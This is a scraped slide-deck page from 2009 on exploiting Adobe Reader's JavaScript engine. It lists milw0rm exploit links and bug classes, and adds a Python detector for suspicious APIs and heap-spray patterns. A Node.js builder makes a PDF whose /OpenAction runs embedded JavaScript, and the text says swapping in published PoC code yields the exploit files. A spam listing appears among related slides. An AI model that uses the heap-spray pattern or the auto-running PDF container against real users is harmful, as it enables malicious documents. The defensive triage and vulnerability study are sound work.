Leveraging Adobe JavaScript Virtual Machine

Zhijie Chen
Engineering Research Center of Information Security, ICST, PKU

May 15, 2009

JoYAN
Contents

1. About Adobe Javascript
2. Exploits Overview
3. Try It Out!
4. Samples In the Wild
1. About Adobe Javascript
What can it do?

Adobe Javascript
Adobe JavaScripts can be created for batch processing of multiple documents, processing within a single document, processing for a given page, and processing for a single form field...

- Customize the behavior of a particular PDF document.
- Customize Acrobat itself.
- Implement security policies.
- Interact with databases and web services.
- Dynamically alter the appearance of a PDF document.
- Capture user-entered data from form fields.
- Submit those data through SOAP-based Web Services.
- Support for online team review.
Adobe JS Objects

Acrobat JavaScript defines several objects that allow your code to interact with Acrobat, a PDF document, or form fields within a PDF document.

Object     Purpose
app        Acrobat
dbg        JavaScript debugger
global     Persistent and cross-document information
dialog     Adobe Dialog Manager (ADM)
SOAP       Web Services
ADBC       Database connections and queries
doc        PDF document
console    JavaScript console
util       JavaScript utility methods
security   Encryption and digital signatures
search     Searching and indexing
event      JavaScript events
Tools I use for manipulating pdf files

- pdftk: PDF toolkit. “If PDF is electronic paper, then pdftk is an electronic staple-remover, hole-punch, binder, secret-decoder-ring, and X-Ray-glasses.”
- Scribus: Open Source Desktop Publishing.
2. Exploits Overview
Adobe PDF Exploit List

Exploits List from Milw0rm
- Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit
- Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit
- Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit
- Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500
- Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit
- Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
- Adobe Acrobat Reader <= 8.1.2 Malformed PDF Remote DOS PoC
- Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption
- Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vulnerability
- Adobe Reader 7.0.8.0 AcroPDF.dll Internet Explorer Denial of Service
Leveraging Type I

- Play with the bugs when invoking a built-in function/method within the Javascript context.
- Easy to trigger and exploit.
Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit

http://milw0rm.com/exploits/8570
Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit

http://milw0rm.com/exploits/8569
Not a stack overflow?
Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit

http://milw0rm.com/exploits/7006
http://milw0rm.com/exploits/6994
Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit

http://milw0rm.com/exploits/8595
- Affected Version: Acrobat Reader 8.1.2 - 9.0
- Tested On: XP SP2 / SP3
- Description: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a malicious file. The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow.
- Failed to uncompress it :(.
Leveraging Type II

- Play with the bugs when parsing a malformed pdf file.
- Only use the javascript to perform a heapspray.
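A defender-side triage script for the two classes described on the Type I and Type II slides, added here as an example and not part of the original deck: it pulls JavaScript out of a PDF (literal /JS strings and /JS stream references, inflating FlateDecode streams, the step the getIcon slide says failed for the author) and flags the built-ins named on the exploit slides plus the heap-spray shape (unescape'd %u strings, a string doubling itself, an array filled in a loop). The PDF builder, the sample scripts, the rule set and the score weights are all constructed for this example; customDictionaryOpen and getAnnots are matched by bare method name so no owning object is assumed.

```python
import re
import zlib

# Type I indicators: built-ins whose bugs are reached by calling them from
# JavaScript, taken from the names on the exploit slides (bare method names
# for the last three, so the owning object is not assumed).
TYPE1_RE = re.compile(r"\b(util\.printf|getIcon|customDictionaryOpen|getAnnots)\s*\(")
# Type II indicators: the script only heap-sprays, so look for the spray shape.
SPRAY_RULES = {
    "unescape_unicode": re.compile(r"unescape\s*\(\s*['\"](?:%u[0-9a-fA-F]{4})+"),
    "self_doubling":    re.compile(r"(\b\w+)\s*\+=\s*\1\b"),           # s += s
    "array_fill_loop":  re.compile(r"for\s*\([^)]*\)\s*\w+\s*\[\s*\w+\s*\]\s*="),
}
OBJ_RE    = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
JS_REF_RE = re.compile(rb"/JS\s+(\d+)\s+\d+\s+R")                     # /JS 4 0 R
JS_LIT_RE = re.compile(rb"/JS\s*\(((?:\\.|[^\\)])*)\)", re.S)          # /JS (...)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)

def _objects(pdf):
    """Map object number -> raw body (between 'obj' and 'endobj')."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}

def _stream_data(body):
    """Raw stream bytes of one object, inflated when /FlateDecode is declared."""
    m = STREAM_RE.search(body)
    if not m:
        return b""
    data = m.group(1)
    if b"/FlateDecode" in body.split(b"stream", 1)[0]:
        try:
            data = zlib.decompress(data)
        except zlib.error:
            return b""  # corrupt or truncated stream: report nothing instead of crashing
    return data

def extract_scripts(pdf):
    """Every JavaScript body reachable through a /JS entry, literal or referenced."""
    objs = _objects(pdf)
    scripts = []
    for m in JS_LIT_RE.finditer(pdf):  # undo the PDF string escapes \( \) \\
        scripts.append(re.sub(rb"\\(.)", rb"\1", m.group(1), flags=re.S).decode("latin-1"))
    for m in JS_REF_RE.finditer(pdf):
        body = objs.get(int(m.group(1)))
        data = _stream_data(body) if body is not None else b""
        if data:
            scripts.append(data.decode("latin-1", "replace"))
    return scripts

def triage(pdf):
    """Score every script: 3 per Type I API hit, 2 per spray indicator (weights are
    this example's own choice). Returns (score, list of hit labels)."""
    hits = []
    for js in extract_scripts(pdf):
        hits += ["type1:" + m.group(1) for m in TYPE1_RE.finditer(js)]
        hits += ["spray:" + name for name, rx in SPRAY_RULES.items() if rx.search(js)]
    return sum(3 if h.startswith("type1") else 2 for h in hits), hits

def build_pdf(js, mode="flate"):
    """Constructed minimal PDF that runs `js` as its OpenAction (not a file from the wild).
    mode: 'flate' (compressed stream), 'raw' (plain stream) or 'literal' (/JS (...) string)."""
    body = js.encode("latin-1")
    if mode == "literal":
        esc = re.sub(rb"([\\()])", rb"\\\1", body)
        action = b"3 0 obj << /S /JavaScript /JS (" + esc + b") >> endobj\n"
        stream_obj = b""
    else:
        data = zlib.compress(body) if mode == "flate" else body
        filt = b" /Filter /FlateDecode" if mode == "flate" else b""
        action = b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
        stream_obj = (b"4 0 obj << /Length %d%s >>\nstream\n" % (len(data), filt)
                      + data + b"\nendstream\nendobj\n")
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            + action + stream_obj + b"trailer << /Root 1 0 R >>\n%%EOF\n")

# Constructed sample scripts: inert, they only carry the shapes the rules look for.
SPRAY_SAMPLE = """// Type II shape: the script only sprays, the parser bug is elsewhere
var nop = unescape("%u4141%u4141");
var block = nop;
while (block.length < 0x10000) block += block;
var heap = new Array();
for (var i = 0; i < 100; i++) heap[i] = block + nop;
"""
TYPE1_SAMPLE = """// Type I shape: suspicious built-ins called from document JavaScript
util.printf("%d", this.numPages);
Collab.getIcon("x");
"""
BENIGN_SAMPLE = """// ordinary form validation script
if (event.value < 0) app.alert("Amount must be positive");
"""

if __name__ == "__main__":
    for name, js in [("spray", SPRAY_SAMPLE), ("type1", TYPE1_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(name, triage(build_pdf(js)))
```

The score is a triage aid, not a verdict: util.printf appears in legitimate form scripts, so a Type I hit means "read this script", and a Type II hit with no flagged API is the cue to look at the file's other streams (JBIG2, fonts, images) for the parser bug the spray is feeding.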
Adobe Acrobat Reader JBIG2 Local Buffer Overflow

http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.h
http://milw0rm.com/exploits/8099
http://milw0rm.com/exploits/8280
Leveraging Type III

- Play with the urls.
- I don’t know whether it works in the browser context or pdf reader context.
- Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Consumption: http://milw0rm.com/exploits/3430
- Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vulnerability: http://milw0rm.com/exploits/3084
- Adobe Reader 7.0.8.0 AcroPDF.dll Internet Explorer Denial of Service: http://milw0rm.com/exploits/3040
- Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit: http://milw0rm.com/exploits/6424
To be continued...

Those I can’t RE:
1. Adobe Acrobat Reader <= 8.1.2 Reader Remote Denial Of Service: http://milw0rm.com/exploits/5687, Overflow?
3. Try It Out!
Try it out!

Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit
http://milw0rm.com/exploits/7006
http://milw0rm.com/exploits/6994
4. Samples In the Wild
Sample in the wild

50.2
hxxp://172.31.25.229/acroPDF.htm
Thank you !

Más contenido relacionado

Similar a Leveraging Adobe JavaScript Virtual Machine

Your java script library
Your java script libraryYour java script library
Your java script libraryjasfog
 
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...Hafez Kamal
 
David Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDavid Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDay Software
 
What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.David Nuescheler
 
Fred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOSFred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOSAxway Appcelerator
 
Great Cup od Java
Great Cup od JavaGreat Cup od Java
Great Cup od JavaCIB Egypt
 
Metaprogramming JavaScript
Metaprogramming  JavaScriptMetaprogramming  JavaScript
Metaprogramming JavaScriptdanwrong
 
Agile JavaScript Testing
Agile JavaScript TestingAgile JavaScript Testing
Agile JavaScript TestingScott Becker
 
Evolving web, evolving search
Evolving web, evolving searchEvolving web, evolving search
Evolving web, evolving searchnet2-project
 
State Of Ajax Zend Con 08
State Of Ajax   Zend Con 08State Of Ajax   Zend Con 08
State Of Ajax Zend Con 08bgalbs
 
MongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring DataMongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring DataChris Richardson
 
Creative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling FrameworkCreative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling FrameworkHuijie Wu
 
Jopenmeraverse introduction
Jopenmeraverse introductionJopenmeraverse introduction
Jopenmeraverse introductionJitendra Chauhan
 
Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)Leonardo Soto
 
Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?André Goliath
 
Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)Giacomo Bergami
 
仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要か仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要かKohei Otsuka
 
2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertag2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertagMarcel Bruch
 

Similar a Leveraging Adobe JavaScript Virtual Machine (20)

Your java script library
Your java script libraryYour java script library
Your java script library
 
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
 
David Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDavid Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and Roadmap
 
What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.
 
Node.JS briefly introduced
Node.JS briefly introducedNode.JS briefly introduced
Node.JS briefly introduced
 
Fred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOSFred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOS
 
RIA
RIARIA
RIA
 
Great Cup od Java
Great Cup od JavaGreat Cup od Java
Great Cup od Java
 
Metaprogramming JavaScript
Metaprogramming  JavaScriptMetaprogramming  JavaScript
Metaprogramming JavaScript
 
Agile JavaScript Testing
Agile JavaScript TestingAgile JavaScript Testing
Agile JavaScript Testing
 
Evolving web, evolving search
Evolving web, evolving searchEvolving web, evolving search
Evolving web, evolving search
 
State Of Ajax Zend Con 08
State Of Ajax   Zend Con 08State Of Ajax   Zend Con 08
State Of Ajax Zend Con 08
 
MongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring DataMongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring Data
 
Creative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling FrameworkCreative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling Framework
 
Jopenmeraverse introduction
Jopenmeraverse introductionJopenmeraverse introduction
Jopenmeraverse introduction
 
Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)
 
Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?
 
Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)
 
仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要か仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要か
 
2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertag2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertag
 

Último

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfhans926745
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 

Último (20)

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 

Leveraging Adobe JavaScript Virtual Machine

  • 1. Leveraging Adobe JavaScript Virtual Machine
       Zhijie Chen, Engineering Research Center of Information Security, ICST, PKU
       May 15, 2009
       JoYAN
  • 2. Contents
       1 About Adobe Javascript
       2 Exploits Overview
       3 Try It Out!
       4 Samples In the Wild
  • 3. Contents (section 1: About Adobe Javascript)
  • 4. What can it do?
       Adobe Javascript: Adobe JavaScripts can be created for batch processing of multiple documents, processing within a single document, processing for a given page, and processing for a single form field...
       - Customize the behavior of a particular PDF document.
       - Customize Acrobat itself.
       - Implement security policies.
       - Interact with databases and web services.
       - Dynamically alter the appearance of a PDF document.
       - Capture user-entered data from form fields.
       - Submit those data through SOAP-based Web Services.
       - Support for online team review.
  • 5. Adobe JS Objects
       Acrobat JavaScript defines several objects that allow your code to interact with Acrobat, a PDF document, or form fields within a PDF document.
       Object    Purpose
       app       Acrobat
       doc       PDF document
       dbg       JavaScript debugger
       console   JavaScript console
       global    Persistent and cross-document information
       util      JavaScript utility methods
       dialog    Adobe Dialog Manager (ADM)
       security  Encryption and digital signatures
       SOAP      Web Services
       search    Searching and indexing
       ADBC      Database connections and queries
       event     JavaScript events
  • 6. Tools I use for manipulating pdf files
       pdftk: PDF toolkit. "If PDF is electronic paper, then pdftk is an electronic staple-remover, hole-punch, binder, secret-decoder-ring, and X-Ray-glasses."
       Scribus: Open Source Desktop Publishing.
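The milw0rm PoCs linked on the following slides are ordinary PDFs whose catalog carries an /OpenAction pointing at a /JavaScript action, so the script runs as soon as Reader opens the file. The Node.js script below is an added example, not code from the slides, from pdftk or from any of the linked PoCs: it writes such a file from scratch with a correct cross-reference table. The embedded script only calls app.alert (a real Acrobat JS method; the message text is made up), and the object numbering and xref layout are this example's own choices.

```javascript
// Added example (not from the slides): build the smallest PDF that makes
// Adobe Reader run document-level JavaScript on open. This is the container
// the milw0rm PoCs on the slides use; the script embedded here is benign
// (app.alert is a real Acrobat JS call, the message is made up), and the
// xref/trailer bookkeeping is computed so the file is well formed.
'use strict';

// PDF literal strings must escape backslashes and parentheses.
function pdfLiteral(s) {
  return '(' + s.replace(/[\\()]/g, (c) => '\\' + c) + ')';
}

// Assemble the objects, recording each object's byte offset for the xref.
// Object numbering (catalog=1, pages=2, page=3, action=4) is an assumption.
function buildPdfWithJs(js) {
  const objects = [
    '<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>',
    '<< /Type /Pages /Kids [3 0 R] /Count 1 >>',
    '<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>',
    '<< /S /JavaScript /JS ' + pdfLiteral(js) + ' >>',
  ];
  let out = '%PDF-1.4\n';
  const offsets = [];
  objects.forEach((body, i) => {
    offsets.push(Buffer.byteLength(out, 'latin1'));
    out += `${i + 1} 0 obj\n${body}\nendobj\n`;
  });
  const xrefPos = Buffer.byteLength(out, 'latin1');
  // Each xref entry is exactly 20 bytes: 10-digit offset, 5-digit gen, type, " \n".
  out += `xref\n0 ${objects.length + 1}\n0000000000 65535 f \n`;
  for (const off of offsets) out += String(off).padStart(10, '0') + ' 00000 n \n';
  out += `trailer\n<< /Size ${objects.length + 1} /Root 1 0 R >>\nstartxref\n${xrefPos}\n%%EOF\n`;
  return Buffer.from(out, 'latin1');
}

// Check that the xref table really points at "N 0 obj" for every object.
// Readers fall back to scanning the file when it does not, which is one
// reason sloppily built PoC files still open.
function xrefIsConsistent(pdf) {
  const text = pdf.toString('latin1');
  const startxref = Number(text.match(/startxref\n(\d+)\n%%EOF/)[1]);
  const table = text.slice(startxref);
  const m = table.match(/xref\n0 (\d+)\n/);
  const n = Number(m[1]);
  const entries = table.slice(m[0].length).split('\n').slice(1, n); // skip free entry 0
  return entries.every((e, i) => {
    const off = Number(e.slice(0, 10));
    return text.startsWith(`${i + 1} 0 obj`, off);
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  const pdf = buildPdfWithJs('app.alert("document-level JavaScript ran");');
  const outPath = require('path').join(require('os').tmpdir(), 'openaction.pdf');
  require('fs').writeFileSync(outPath, pdf);
  console.log('wrote', outPath, 'xref consistent:', xrefIsConsistent(pdf));
}
```

Open the written file in a Reader build of the era and the alert fires before the page is shown; swapping the app.alert call for the body of one of the milw0rm PoCs gives exactly the file layout those PoCs ship. Keeping the xref consistent matters for analysis too: tools like pdftk refuse or rewrite files whose offsets are wrong.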
  • 7. Contents (section 2: Exploits Overview)
  • 8. Adobe PDF Exploit List
       Exploits list from Milw0rm:
       - Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit
       - Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit
       - Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit
       - Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500
       - Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit
       - Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
       - Adobe Acrobat Reader <= 8.1.2 Malformed PDF Remote DOS PoC
       - Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption
       - Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vulnerability
       - Adobe Reader 7.0.8.0 AcroPDF.dll Internet Explorer Denial of Service
  • 9. Leveraging Type I
       Play with the bugs when invoking a built-in function/method within the JavaScript context. Easy to trigger and exploit.
  • 10. Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit
       http://milw0rm.com/exploits/8570
  • 11. Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit
       http://milw0rm.com/exploits/8569
       Not a stack overflow?
  • 12. Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit
       http://milw0rm.com/exploits/7006
       http://milw0rm.com/exploits/6994
  • 13. Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit
       http://milw0rm.com/exploits/8595
       Affected Version: Acrobat Reader 8.1.2 - 9.0
       Tested On: XP SP2 / SP3
